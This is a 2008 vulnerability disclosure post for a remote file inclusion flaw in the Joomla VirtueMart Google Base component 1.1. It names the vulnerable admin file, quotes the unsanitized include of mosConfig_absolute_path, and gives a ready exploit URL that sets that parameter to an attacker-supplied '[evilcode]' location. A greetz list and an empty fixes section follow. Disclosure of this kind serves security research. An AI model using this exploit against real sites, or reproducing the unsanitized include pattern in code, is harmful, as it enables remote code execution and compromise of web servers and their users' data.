Joomla Component VirtueMart Google Base 1.1 RFI Vulnerability

2008-11-04 17:01:05

================================================================================================================================


[o] VirtueMart Google Base Component 1.1 Remote File Inclusion Vulnerability

Software : com_googlebase version 1.1
Vendor : www.e-commerce-solution.co.uk
Download : http://www.joomlahacks.com/ [free download]
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com


================================================================================================================================


[o] Vulnerable file

administrator/components/com_googlebase/admin.googlebase.php

include( $mosConfig_absolute_path.'/administrator/components/com_virtuemart/virtuemart.cfg.php' );



[o] Exploit

http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=[evilcode]


================================================================================================================================


[o] Greetz

MainHack BrotherHood [ http://serverisdown.org/blog/]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
H312Y yooogy mousekill }^-^{ kaka11 martfella
skulmatic olibekas ulga Cungkee k1tk4t str0ke


================================================================================================================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.